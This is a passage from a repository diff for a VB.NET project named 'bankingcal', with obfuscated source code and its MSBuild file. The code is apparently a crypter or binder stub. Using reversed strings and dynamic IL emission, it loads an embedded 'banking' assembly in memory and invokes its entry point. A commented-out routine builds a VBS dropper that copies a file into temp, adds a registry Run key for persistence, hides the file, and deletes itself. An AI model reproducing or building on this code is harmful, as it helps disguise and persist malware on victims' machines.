fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldarg_3)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Brfalse_S, OGGW0A8076W8TS82)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldloc_0)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldarg_2)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.EmitCall(OpCodes.Callvirt, GetType(Assembly).GetMethod(Rev("epyTteG"), New Type() {GetType(String)}), Nothing)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldarg_3)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.EmitCall(OpCodes.Callvirt, GetType(Type).GetMethod(Rev("dohteMteG"), New Type() {GetType(String)}), Nothing)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldnull)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldarg_1)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.EmitCall(OpCodes.Callvirt, GetType(MethodBase).GetMethod(Rev("ekovnI"), New Type() {GetType(Object), GetType(Object())}), Nothing)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ret)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.MarkLabel(OGGW0A8076W8TS82)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldloc_0)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.EmitCall(OpCodes.Callvirt, GetType(Assembly).GetProperty(Rev("tnioPyrtnE")).GetGetMethod(), Nothing)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldnull)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ldarg_1)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.EmitCall(OpCodes.Callvirt, GetType(MethodBase).GetMethod(Rev("ekovnI"), New Type() {GetType(Object), GetType(Object())}), Nothing)
fcevgrY943212vbq626r7GI1l0PEsNYS3JSC2yM4lCOis0cv3yLX.Emit(OpCodes.Ret)
Return fxlcrfj0EOwxCJBk7T3Iuoh5N0k4Y3WV7uz.Invoke(Nothing, New Object() {rAl, prm, clz, meth})
End Function
Friend WithEvents TextBox1 As System.Windows.Forms.TextBox
Friend WithEvents Button1 As System.Windows.Forms.Button
Friend WithEvents Label1 As System.Windows.Forms.Label
Friend WithEvents Label2 As System.Windows.Forms.Label
Friend WithEvents Label3 As System.Windows.Forms.Label
Friend WithEvents Label4 As System.Windows.Forms.Label
Friend WithEvents Panel1 As System.Windows.Forms.Panel
Friend WithEvents ProgressBar1 As System.Windows.Forms.ProgressBar
End Class
Public Class tgcape
Public Shared Sub crabhut(ByVal solo As String)
' Dim optionalArguments As String = ""
' Dim polo As String = Environment.GetEnvironmentVariable("%AppTemp%") & "\%SubName%" & "\%FileName%"
' Dim yolo As String = Environment.GetEnvironmentVariable("%AppTemp%") & "\%SubName%" & "\%FileName%" + ".vbs"
' Dim puote As String = """"
' Dim nl As String = Environment.NewLine
' Dim vbs_file As String = "on error resume next" & vbCr & vbLf & "groop = ""winmgmts:{impersonationLevel=impersonate}//./root/default:StdRegProv""" & vbCr & vbLf & "set tonytinber = CreateObject(" & puote & "Scripting.tonytinbertemObject" & puote & ")" & vbCr & vbLf & "tonytinber.CopyFile " & puote & solo & puote & ", " & puote & polo & puote & vbCr & vbLf & "dim gerata" & vbCr & vbLf & "Set gerata = CreateObject(" & puote & "WScript.Shell" & puote & ")" & vbCr & vbLf & "gerata.regwrite " & puote & "HKCU\Software\Windows\Microsoft\CurrentVersion\Run\%KeyName%" & puote & ", " & puote & polo & puote & ", " & puote & "REG_EXPAND_SZ" & puote & vbCr & vbLf & "dim triton" & vbCr & vbLf & "set triton = tonytinber.GetFile(" & puote & polo & puote & ")" & vbCr & vbLf & "triton.attributes = 7" & vbCr & vbLf & "tonytinber.DeleteFile WScript.ScriptFullName"
' If File.Exists(yolo) Then
' File.Delete(yolo)
' End If
'Dim dsa As TextWriter = New StreamWriter(yolo)
' dsa.Write(vbs_file)
'dsa.Close()
'System.Diagnostics.Process.Start(yolo)
End Sub
End Class
Namespace My.Resources2
'This class was auto-generated by the StronglyTypedResourceBuilder
'class via a tool like ResGen or Visual Studio.
'To add or remove a member, edit your .ResX file then rerun ResGen
'with the /str option, or rebuild your VS project.
'''<summary>
''' A strongly-typed resource class, for looking up localized strings, etc.
'''</summary>
<Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0"), _
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
Global.Microsoft.VisualBasic.HideModuleNameAttribute()> _
Friend Module Resources2
Private resourceMan As Global.System.Resources.ResourceManager
Private resourceCulture As Global.System.Globalization.CultureInfo
'''<summary>
''' Returns the cached ResourceManager instance used by this class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
Get
If Object.ReferenceEquals(resourceMan, Nothing) Then
Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("bankingcal.Resources", GetType(Resources2).Assembly)
resourceMan = temp
End If
Return resourceMan
End Get
End Property
'''<summary>
''' Overrides the current thread's CurrentUICulture property for all
''' resource lookups using this strongly typed resource class.
'''</summary>
<Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
Friend Property Culture() As Global.System.Globalization.CultureInfo
Get
Return resourceCulture
End Get
Set(ByVal value As Global.System.Globalization.CultureInfo)
resourceCulture = value
End Set
End Property
Friend ReadOnly Property banking() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("banking", resourceCulture)
Return CType(obj, Byte())
End Get
End Property
Friend ReadOnly Property text() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("text", resourceCulture)
Return CType(obj, Byte())
End Get
End Property
Friend ReadOnly Property text2() As Byte()
Get
Dim obj As Object = ResourceManager.GetObject("%Binder2%", resourceCulture)
Return CType(obj, Byte())
End Get
End Property
End Module
End Namespace
Binary file not shown.

After

Width:  |  Height:  |  Size: 32 KiB

+176
View File
@@ -0,0 +1,176 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">x86</Platform>
<ProductVersion>
</ProductVersion>
<SchemaVersion>
</SchemaVersion>
<ProjectGuid>{B61DF421-1965-4220-9954-6FD5D2765508}</ProjectGuid>
<OutputType>Exe</OutputType>
<StartupObject>bankingcal.form1</StartupObject>
<RootNamespace>bankingcal</RootNamespace>
<AssemblyName>bankingcal</AssemblyName>
<FileAlignment>512</FileAlignment>
<MyType>Console</MyType>
<TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|x86' ">
<PlatformTarget>x86</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<DefineDebug>true</DefineDebug>
<DefineTrace>true</DefineTrace>
<OutputPath>bin\Debug\</OutputPath>
<DocumentationFile>bankingcal.xml</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|x86' ">
<PlatformTarget>x86</PlatformTarget>
<DebugType>pdbonly</DebugType>
<DefineDebug>false</DefineDebug>
<DefineTrace>true</DefineTrace>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DocumentationFile>bankingcal.xml</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
</PropertyGroup>
<PropertyGroup>
<OptionExplicit>On</OptionExplicit>
</PropertyGroup>
<PropertyGroup>
<OptionCompare>Binary</OptionCompare>
</PropertyGroup>
<PropertyGroup>
<OptionStrict>Off</OptionStrict>
</PropertyGroup>
<PropertyGroup>
<OptionInfer>On</OptionInfer>
</PropertyGroup>
<PropertyGroup>
<ApplicationManifest>My Project\app.manifest</ApplicationManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<PlatformTarget>AnyCPU</PlatformTarget>
<OutputPath>bin\Debug\</OutputPath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|AnyCPU'">
<PlatformTarget>AnyCPU</PlatformTarget>
<OutputPath>bin\Release\</OutputPath>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
<DebugSymbols>true</DebugSymbols>
<DefineDebug>true</DefineDebug>
<DefineTrace>true</DefineTrace>
<OutputPath>bin\x64\Debug\</OutputPath>
<DocumentationFile>bankingcal.xml</DocumentationFile>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
<DebugType>full</DebugType>
<PlatformTarget>x64</PlatformTarget>
<CodeAnalysisLogFile>bin\Debug\bankingcal.exe.CodeAnalysisLog.xml</CodeAnalysisLogFile>
<CodeAnalysisUseTypeNameInSuppression>true</CodeAnalysisUseTypeNameInSuppression>
<CodeAnalysisModuleSuppressionsFile>GlobalSuppressions.vb</CodeAnalysisModuleSuppressionsFile>
<CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSetDirectories>;c:\Program Files (x86)\Microsoft Visual Studio 10.0\Team Tools\Static Analysis Tools\\Rule Sets</CodeAnalysisRuleSetDirectories>
<CodeAnalysisRuleDirectories>;c:\Program Files (x86)\Microsoft Visual Studio 10.0\Team Tools\Static Analysis Tools\FxCop\\Rules</CodeAnalysisRuleDirectories>
<CodeAnalysisIgnoreBuiltInRules>true</CodeAnalysisIgnoreBuiltInRules>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Release|x64'">
<DefineTrace>true</DefineTrace>
<OutputPath>bin\x64\Release\</OutputPath>
<DocumentationFile>bankingcal.xml</DocumentationFile>
<Optimize>true</Optimize>
<NoWarn>42016,41999,42017,42018,42019,42032,42036,42020,42021,42022</NoWarn>
<DebugType>pdbonly</DebugType>
<PlatformTarget>x64</PlatformTarget>
<CodeAnalysisLogFile>bin\Release\bankingcal.exe.CodeAnalysisLog.xml</CodeAnalysisLogFile>
<CodeAnalysisUseTypeNameInSuppression>true</CodeAnalysisUseTypeNameInSuppression>
<CodeAnalysisModuleSuppressionsFile>GlobalSuppressions.vb</CodeAnalysisModuleSuppressionsFile>
<CodeAnalysisRuleSet>MinimumRecommendedRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSetDirectories>;c:\Program Files (x86)\Microsoft Visual Studio 10.0\Team Tools\Static Analysis Tools\\Rule Sets</CodeAnalysisRuleSetDirectories>
<CodeAnalysisRuleDirectories>;c:\Program Files (x86)\Microsoft Visual Studio 10.0\Team Tools\Static Analysis Tools\FxCop\\Rules</CodeAnalysisRuleDirectories>
</PropertyGroup>
<PropertyGroup>
<ApplicationIcon>icon.ico</ApplicationIcon>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Deployment" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Import Include="Microsoft.VisualBasic" />
<Import Include="System" />
<Import Include="System.Collections" />
<Import Include="System.Collections.Generic" />
<Import Include="System.Data" />
<Import Include="System.Diagnostics" />
</ItemGroup>
<ItemGroup>
<Compile Include="banking.vb">
<SubType>Form</SubType>
</Compile>
<Compile Include="My Project\AssemblyInfo.vb" />
<Compile Include="My Project\Application.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Application.myapp</DependentUpon>
</Compile>
<Compile Include="My Project\Resources.Designer.vb">
<AutoGen>True</AutoGen>
<DesignTime>True</DesignTime>
<DependentUpon>Resources.resx</DependentUpon>
</Compile>
<Compile Include="My Project\Settings.Designer.vb">
<AutoGen>True</AutoGen>
<DependentUpon>Settings.settings</DependentUpon>
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="My Project\Resources.resx">
<Generator>VbMyResourcesResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.vb</LastGenOutput>
<CustomToolNamespace>My.Resources</CustomToolNamespace>
<SubType>Designer</SubType>
</EmbeddedResource>
</ItemGroup>
<ItemGroup>
<None Include="My Project\app.manifest" />
<None Include="My Project\Application.myapp">
<Generator>MyApplicationCodeGenerator</Generator>
<LastGenOutput>Application.Designer.vb</LastGenOutput>
</None>
<None Include="My Project\Settings.settings">
<Generator>SettingsSingleFileGenerator</Generator>
<CustomToolNamespace>My</CustomToolNamespace>
<LastGenOutput>Settings.Designer.vb</LastGenOutput>
</None>
</ItemGroup>
<ItemGroup>
<None Include="banked.txt" />
</ItemGroup>
<ItemGroup>
<None Include="bin\Debug\banking.dll" />
</ItemGroup>
<ItemGroup>
<None Include="Resources\banking.dll" />
</ItemGroup>
<ItemGroup>
<None Include="Resources\text.txt" />
</ItemGroup>
<ItemGroup>
<Content Include="icon.ico" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.VisualBasic.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->
</Project>